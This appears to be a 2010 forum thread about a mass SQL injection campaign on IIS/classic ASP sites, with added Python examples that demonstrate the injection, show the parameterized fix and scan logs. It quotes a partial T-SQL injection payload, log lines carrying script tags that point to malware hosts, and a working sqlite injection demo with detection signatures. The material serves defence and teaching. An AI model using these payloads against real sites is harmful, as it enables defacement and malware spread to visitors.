A bunch of IIS sites got hacked with JavaScript malware pointing to ww.robint.us/u.js.
Google cache says more than 1,000,000 different pages got affected:
http://www.google.com/#hl=en&source=hp&q=http%3A%2F%2Fww.robint.us%2Fu.js
http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html
My question is: Did anyone here get hacked with that and still have any logs (or a network dump) available for analysis? If you do, have you spotted anything interesting in there?
Sites as big as wsj.com got hacked, and some people are saying that maybe a zero-day on IIS/ASP.NET is in the wild...
-
We got hit through some old classic asp pages two days ago.
The attack looks like it appends the following to query parameters:
;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=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%20eXEc(@s)--
It appends the script to all text fields in the database. I don't think it has anything special to do with IIS/ASP.
Kind regards Claus
From Claus Pedersen -
I got hit with it too. Just a SQL injection that loads a trojan / session-jacking JS.
Also, that is not a proper search query for finding all affected sites.
"http: //ww.robint.us/u.js" <> http: //ww.robint.us/u.js (don't visit!)
From Shawn -
decoded here http://nsmjunkie.blogspot.com/2010/06/anatomy-of-latest-mass-iisasp-infection.html
-
I got this on several of my websites too... what is the appropriate fix to prevent this from happening again?
Shawn: use SqlParameters with your SqlCommands instead of concatenating strings.
From Kris -
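The advice above is the whole fix for this class of attack, so here is an added example (not code from the thread or from any of the sites mentioned) showing why. It reproduces the concatenated-query pattern the affected classic ASP pages used and the effect Claus describes (a script tag appended to every text column), then the same lookup with a bound parameter. It uses an in-memory sqlite database as a stand-in for SQL Server, a constructed table, and example.invalid as a placeholder host; the hostile value is a plain UPDATE rather than the T-SQL DECLARE/EXEC batch from the real campaign, because sqlite has no EXEC.

```python
import sqlite3

# Constructed stand-in for the site's database; the real sites ran SQL Server
# behind classic ASP, but the injection mechanics are the same.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany("INSERT INTO listings (title, body) VALUES (?, ?)",
                   [("Benajarafe", "Villa by the sea"), ("Malaga", "City flat")])
    db.commit()
    return db

# Constructed hostile value for the id parameter. The real campaign appended a
# T-SQL DECLARE/EXEC batch; this sqlite-flavoured version appends a plain UPDATE
# that does what the thread describes: tack a script tag onto every text column.
# example.invalid is a placeholder, not the real malware host.
TAG = "<script src=http://example.invalid/u.js></script>"
HOSTILE_ID = f"1; UPDATE listings SET title = title || '{TAG}', body = body || '{TAG}' --"

def lookup_concatenated(db, listing_id):
    """Vulnerable: the query is built by string concatenation.

    executescript() runs every statement in the string, which is how ADO's
    Connection.Execute behaves against SQL Server, so the appended UPDATE runs."""
    db.executescript("SELECT title FROM listings WHERE id = " + listing_id)

def lookup_parameterized(db, listing_id):
    """Fixed: the value travels as a bound parameter and can never become SQL."""
    cur = db.execute("SELECT title FROM listings WHERE id = ?", (listing_id,))
    return [row[0] for row in cur.fetchall()]

def damaged_rows(db):
    """How many rows now carry an injected script tag."""
    cur = db.execute(
        "SELECT COUNT(*) FROM listings WHERE title LIKE '%<script%' OR body LIKE '%<script%'")
    return cur.fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    lookup_concatenated(db, HOSTILE_ID)
    print("concatenated query, rows defaced:", damaged_rows(db))
    db = make_db()
    print("parameterized query, result:", lookup_parameterized(db, HOSTILE_ID),
          "rows defaced:", damaged_rows(db))
```

With the bound parameter the hostile string is compared against the integer id column as data and simply matches nothing; no statement boundary is ever created, which is the same guarantee SqlParameter gives in ADO.NET.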
We got under heavy sql injection attack today looking like this:
[06-11-2010 - 11:36:52] Client at 67.195.110.177: URL length exceeded maximum allowed. Request will be rejected. Site Instance='1721918753', URL='/casas-ferias/1397/Benajarafe%%3Cscript+src%%3Dhttp%%3A%%2F%%2F2677.in%%2Fyahoo.js%%3E%%3C%%2Fscript%%3E/6/Malaga%%3Cscript+src%%3Dhttp%%3A%%2F%%2F2677.in%%2Fyahoo.js%%3E%%3C%%2Fscript%%3E/0/Andaluzia/Benajarafe%%3Cscript+src%%3Dhttp%%3A%%2F%%2F2677%%2Ein%%2Fyahoo%%2Ejs%%3E%%3C%%2Fscript%%3E.html'
The source IPs are actually Yahoo crawler IPs, so it looks like someone has published SQL injection links on some third-party website and then Yahoo follows them blindly, so the attack is actually coming "from Yahoo" even though they don't know about this.
They also use a yahoo.js file to make it look even more Yahoo-ish, but the domain is 2677.in (and probably others).
Really clever way to get a "robot network" to do the hard work.
Kris, as Shawn says you should use SqlParameters. You can use Microsoft UrlScan 3.1 to protect you, but you should also make sure that your code isn't vulnerable.
From Claus Pedersen -
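For anyone going back through logs as the original question asks, here is an added example (not from the thread) that scans IIS and UrlScan-style log lines for the two patterns quoted above: the DECLARE/EXEC batch appended to a query parameter, and the injected script tag. It undoes URL encoding first, including the doubled percent signs seen in the UrlScan line above and double-encoded requests, and collects the hosts referenced by injected script tags so they can go on a block list. The log lines are constructed for the example (TEST-NET addresses, placeholder payload body); only 2677.in and the payload shape come from the thread.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines (not from the original thread): one UrlScan-style
# rejection line modelled on the one quoted above, two W3C-style IIS log lines
# and one benign request whose path merely contains the word "declaration".
SAMPLE_LOG = [
    "[06-11-2010 - 11:36:52] Client at 192.0.2.10: URL length exceeded maximum allowed. "
    "Request will be rejected. Site Instance='1', URL='/casas-ferias/1397/Benajarafe"
    "%%3Cscript+src%%3Dhttp%%3A%%2F%%2F2677.in%%2Fyahoo.js%%3E%%3C%%2Fscript%%3E/6/Malaga.html'",
    "2010-06-08 03:12:44 10.0.0.5 GET /default.asp id=1;dEcLaRe%20@s%20vArChAr(8000)"
    "%20sEt%20@s=%27placeholder%27%20eXEc(@s)-- 80 - 192.0.2.20 Mozilla/4.0 200 0 0",
    "2010-06-08 03:12:45 10.0.0.5 GET /default.asp id=1397 80 - 192.0.2.30 Mozilla/4.0 200 0 0",
    "2010-06-08 03:12:46 10.0.0.5 GET /news/declaration.asp id=2 80 - 192.0.2.31 Mozilla/4.0 200 0 0",
]

# Signatures are matched on the decoded request, case-insensitively, because the
# campaign used mixed case (dEcLaRe, eXEc) to slip past naive filters.
SIGNATURES = {
    "tsql-batch": re.compile(r"declare\s+@\w+\s+varchar\s*\(\d+\).*?exec\s*\(", re.I | re.S),
    "stacked-statement": re.compile(r";\s*(?:declare|exec(?:ute)?|update|insert|drop)\b", re.I),
    "script-tag": re.compile(r"<script\b", re.I),
}
SCRIPT_SRC = re.compile(r"""<script\s+src\s*=\s*["']?(?:https?://)?([\w.-]+)""", re.I)

def decode(raw, rounds=3):
    """Undo URL encoding, including doubled percent signs and double encoding."""
    text = raw.replace("%%", "%")
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify(line):
    """Return the sorted list of signature names that fire on one log line."""
    decoded = decode(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def script_hosts(lines):
    """Collect hosts referenced by injected script tags, for block lists / IoCs."""
    hosts = set()
    for line in lines:
        hosts.update(h.lower() for h in SCRIPT_SRC.findall(decode(line)))
    return hosts

def scan(lines):
    """Return [(line_number, tags)] for every line that triggers a signature."""
    hits = []
    for number, line in enumerate(lines, start=1):
        tags = classify(line)
        if tags:
            hits.append((number, tags))
    return hits

if __name__ == "__main__":
    for number, tags in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(tags)}")
    print("script hosts:", ", ".join(sorted(script_hosts(SAMPLE_LOG))))
```

Run it over a real W3C log with `scan(open(path).read().splitlines())`; the stacked-statement signature is deliberately narrow (a semicolon followed by a statement keyword) so that ordinary paths containing words like "declaration" do not fire.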
Here's a very detailed analysis: http://blog.armorize.com/2010/06/recent-evolution-of-mass-sql-injection.html
From Wayne